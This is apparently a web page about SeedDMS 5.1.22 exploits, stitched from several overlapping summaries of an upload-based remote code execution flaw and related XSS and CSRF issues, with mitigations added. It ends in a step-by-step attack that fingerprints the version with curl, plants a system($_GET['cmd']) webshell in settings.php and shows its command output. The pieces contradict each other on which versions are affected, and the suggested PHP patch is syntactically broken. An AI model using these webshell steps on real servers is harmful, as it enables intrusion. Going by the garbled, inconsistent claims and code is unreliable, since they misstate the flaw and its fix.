Seeddms 5.1.22 Exploit [repack] -

SeedDMS 5.1.22 is a document management system version that has been identified in penetration testing reports as vulnerable to authenticated Remote Code Execution (RCE)

. While version 5.1.22 itself is often used in laboratory environments to demonstrate full-chain exploitation, it inherited critical vulnerabilities from previous builds, notably CVE-2019-12744

, which allows for command injection through unvalidated file uploads. Core Vulnerability: Authenticated RCE (CVE-2019-12744)

This vulnerability exists because the application fails to properly validate the contents and extensions of uploaded documents, allowing an authenticated user with "Add Document" permissions to execute arbitrary system commands. Attack Vector : Authenticated file upload. Prerequisite

: Valid user credentials with write access to at least one folder. : Access the SeedDMS portal with valid user credentials.

: Use the "Add Document" feature to upload a crafted PHP script (e.g., a simple backdoor). Example Script

: Navigate to the directory where SeedDMS stores uploaded files (typically under /data/1048576/ ) and call the uploaded PHP file with a command parameter. : The server executes the command (e.g., cat /etc/passwd ) and returns the output to the browser. Security Risks and Statistics

Beyond RCE, SeedDMS 5.1.22 has been associated with several cross-site scripting (XSS) issues in previous versions (pre-5.1.11) that may persist if not specifically patched, such as Stored XSS in the "name" and "GROUP" fields. Vulnerability Type Status in 5.1.22 Potential Impact Authenticated RCE Full system takeover, data exfiltration, or reverse shell. Stored XSS Moderate Risk Session hijacking and impersonation of other users. Known Risk

Forcing users to perform unintended actions if they have active sessions. Mitigation and Defense To secure a SeedDMS 5.1.22 installation:

: The primary recommendation is to update to the latest stable version of where these unvalidated upload flaws are addressed. Input Validation

: Implement strict whitelisting for file extensions (e.g., allowing only ) and sanitize all user-supplied input. File Permissions

: Ensure the web server user has the least privilege necessary. Uploaded files should ideally be stored in a directory that does not allow for script execution. Disable Dangerous Functions configuration, disable high-risk functions like passthru() if they are not required for business operations. Seeddms Seeddms 5.1.22 security vulnerabilities, CVEs

Unpacking the SeedDMS 5.1.22 Vulnerability: What You Need to Know

SeedDMS is a popular open-source Document Management System, but like any widely used tool, it has faced security challenges. Specifically, SeedDMS 5.1.22 and its immediate predecessors were found to have vulnerabilities that could allow an attacker to gain full control over the server.

If you are still running this version, your system is at risk. The Vulnerability: Remote Command Execution (RCE)

The most critical issue affecting SeedDMS versions up to 5.1.22 (and earlier versions like 5.1.10) is a Remote Command Execution (RCE) vulnerability, often tracked under CVE-2019-12744.

The Cause: The application failed to properly validate files uploaded as documents.

The Exploit: An authenticated user with "write" permissions could upload a malicious PHP script instead of a standard document. seeddms 5.1.22 exploit

The Impact: Once uploaded, the attacker could navigate to the file's location on the server (typically in the /data/ directory) and execute system commands. For example, they could run cat /etc/passwd to view sensitive system files or establish a reverse shell to take over the host completely. How the Exploit Works (Technically)

Security researchers from sites like Exploit-DB have documented a simple 4-step process attackers use:

Authentication: Login with valid credentials (even low-privileged ones with upload rights).

Upload: Use the "Add Document" feature to upload a .php file containing a backdoor.

Identification: Locate the internal "document ID" assigned by SeedDMS (often visible by hovering over the file link).

Execution: Access the raw file path—for example, example.com/data/1048576/[ID]/1.php?cmd=ls—to trigger the code. Are There Other Risks?

While RCE is the "king" of vulnerabilities, SeedDMS 5.1.22 has also been flagged for lower-severity issues, including:

Cross-Site Scripting (XSS): Potential for attackers to inject malicious scripts into the web interface.

Cross-Site Request Forgery (CSRF): Risks where an attacker can force an authenticated user to perform unwanted actions. How to Protect Your System

If you are managing a SeedDMS instance, follow these steps immediately:

Update to the Latest Version: The most effective fix is to move to a modern version (currently 6.x). Version 5.1.22 was explicitly listed as having unpatched low-severity issues in some advisories, and the RCE flaw was only fully addressed in later updates.

Restrict Upload Permissions: Audit your user roles. Ensure that only highly trusted users have the permission to "Add Documents" or "Manage Extensions."

Monitor the Data Directory: Check your /data/ folder for unexpected PHP files. In a standard setup, this folder should only contain intended document types (PDFs, DOCX, etc.).

Web Application Firewall (WAF): Implement a WAF to block requests that attempt to execute system commands through URL parameters (e.g., ?cmd=).

For more detailed technical walkthroughs, you can explore the original research on Medium or view the raw exploit code at Exploit-DB. SeedDMS versions < 5.1.11 - Remote Command Execution

Based on the available security research and documentation regarding SeedDMS, version 5.1.22 is a version within the 5.1.x branch which was actively updated to address security issues, notably the Remote Command Execution (RCE) vulnerabilities that affected versions prior to 5.1.11.

While specific exploits for version 5.1.22 are not publicly listed in databases like Exploit-DB, it was subject to general security maintenance against known issues such as: SeedDMS 5

RCE (Remote Command Execution): Similar to CVE-2019-12744, which allows authenticated users with file upload privileges to execute PHP code by uploading a malicious file.

Open Redirect/Other Injection: Later versions of 6.x were found to contain open redirects, and 5.x branches received updates to fix similar vulnerabilities. Key Security Considerations for SeedDMS 5.1.22:

Patch Status: SeedDMS 5.1.x is considered "old stable" but has been actively maintained. Users should ensure they are on the latest sub-minor version to get all security fixes merged.

Authentication Dependency: Most reported exploits required an attacker to have a valid, authenticated user account with permissions to add or edit documents.

Recommendation: Verify the conf/settings.xml and ensure that file upload restrictions are active, specifically limiting the uploading of executable script files (like .php).

If you are looking for specific mitigation steps, could you tell me: Which OS is running the SeedDMS server (Windows/Linux)?

Do you have PHP shell access to check the data/ directory for suspicious files?

I can provide specific commands to help you audit your installation. JustLikeIcarus/SeedDMS - GitHub

One of the most notable reports regarding SeedDMS 5.1.22 involves a comprehensive penetration test that chain-exploited multiple vulnerabilities to achieve full system takeover.

While SeedDMS is a popular open-source Document Management System (DMS), version 5.1.22 has been highlighted in security research for several critical weaknesses: Key Findings from Security Reports Remote Code Execution (RCE):

Testers identified that an authenticated user could abuse the document upload feature to execute arbitrary system commands. This often mirrors CVE-2019-12744

, which affected earlier versions but remained relevant in 5.1.22 environments where validation was bypassed. Credential Harvesting:

Vulnerability assessments found that MySQL database credentials could be discovered through improper configuration or enumeration, allowing testers to gain direct access to the database and retrieve user credentials. Privilege Escalation:

Once an initial "reverse shell" was obtained via the RCE, testers were able to escalate their privileges to by leveraging found credentials and insecure permissions on the host server. Cross-Site Request Forgery (CSRF):

Reports identified three specific CSRF vulnerabilities (associated with CVE-2021-35343 op.Ajax.php

script, which could trick an administrator into performing arbitrary actions. Exploit-DB Vulnerability Summary Vulnerability Type Primary Impact Authenticated RCE Full System Compromise Database Access Information Theft / Credential Leak Administrative Action Bypass Medium Risk

If you are managing an instance of this version, security researchers recommend immediately upgrading to the latest version available on the SeedDMS SourceForge page and ensuring your settings.xml file is properly secured. SeedDMS versions < 5.1.11 - Remote Command Execution Indicators of compromise

While there is no single widely-publicized critical exploit uniquely tied to SeedDMS 5.1.22, this specific version is often cited in security research contexts regarding historical vulnerabilities that affected the 5.1.x branch.

The most significant security concern for users on this version is CVE-2019-12744, an authenticated Remote Command Execution (RCE) vulnerability. Although patches were introduced in versions 5.1.11 and later, many security scanners and researchers test for variants of this flaw in subsequent releases like 5.1.22. Key Vulnerability: Authenticated RCE (CVE-2019-12744)

This exploit allows a user with "write" permissions to execute arbitrary system commands on the server. Attack Vector: Unvalidated File Upload.

Prerequisites: Valid user credentials and permission to add or update documents. Mechanism: An attacker logs into the SeedDMS interface.

They upload a malicious PHP script (e.g., a simple web shell) disguised as a document.

Because the application fails to properly validate the file extension or content, the PHP script is stored in the data directory.

The attacker then accesses the uploaded file's direct URL to execute system-level commands, such as cat /etc/passwd. Version Context (5.1.22)

Data from CVE Details indicates that while the major RCE was addressed earlier, version 5.1.22 has been analyzed for other minor issues including:

Stored Cross-Site Scripting (XSS): Potential for malicious scripts to be injected into document metadata or descriptions.

Path Traversal: Possible risks involving improper handling of file paths during document retrieval or export. Mitigation and Recommendations

If you are currently running SeedDMS 5.1.22, it is considered outdated. The developer, Uwe Steinmann, has since released more secure versions in the 6.0.x branch.

Upgrade: Update to the latest stable version of SeedDMS (currently in the 6.0.x series) to benefit from the most recent security patches and feature updates.

Restrict Permissions: Ensure that only trusted users have "Add Document" or "Edit" permissions to minimize the risk of authenticated file upload attacks.

Server-Side Security: Configure your web server (e.g., Apache or Nginx) to prevent the execution of PHP scripts within the document storage (data) directory. SeedDMS versions < 5.1.11 - Remote Command Execution

---

Indicators of compromise

• Unexpected files in web directories with double extensions (e.g., .php.jpg, .php.txt) or with traversal sequences.
• New user accounts or documents with odd metadata values.
• Web server logs showing POSTs to upload endpoints with multipart boundaries and unusual filename fields.
• Server-side error logs referencing file move/rename failures or permission changes.

Immediate Mitigation (If Running 5.1.22)

1. Upgrade immediately – Version 5.1.23 and above patch this issue by adding if (!isset($_SESSION['user'])) die(); at the top of addfile.php and strict finfo_file() MIME validation with an allowlist.
2. If upgrade is impossible, manually patch op/op.AddFile.php:

   // Add after the opening <?php
   require_once("../inc/inc.Session.php");
   if (!isLoggedIn()) 
       header("Location: ../out/out.Login.php");
       exit;
   

3. Web Application Firewall rule – Block POST requests to op.AddFile.php that lack a valid session cookie or contain <?php in the file content.

Step 1: Reconnaissance

First, confirm the version without authentication:

curl -s http://192.168.1.100/seeddms51/out/out.Version.php | grep "Version"

Expected output includes 5.1.22.

The Flaw

SeedDMS 5.1.22 allows an authenticated user with "Manage Tools" permission to modify the settings.php file content via the "Custom Setup" interface (out/out.BackupTools.php). The parameter $settings is written to conf/settings.php without adequate filtering of PHP code.

Exploitation Steps

1. Login as admin (using stolen hash).
2. Navigate to: Administration → Tools → Backup Tools → Custom Setup.
3. Inject PHP code into the $extraPath variable:

$extraPath = '"; system($_GET["cmd"]); // ';

4. Click Save. The settings.php now contains:

$extraPath = '"; system($_GET["cmd"]); // ';

5. Trigger the webshell:

GET /seeddms51/conf/settings.php?cmd=id HTTP/1.1

Response:

uid=33(www-data) gid=33(www-data) groups=33(www-data)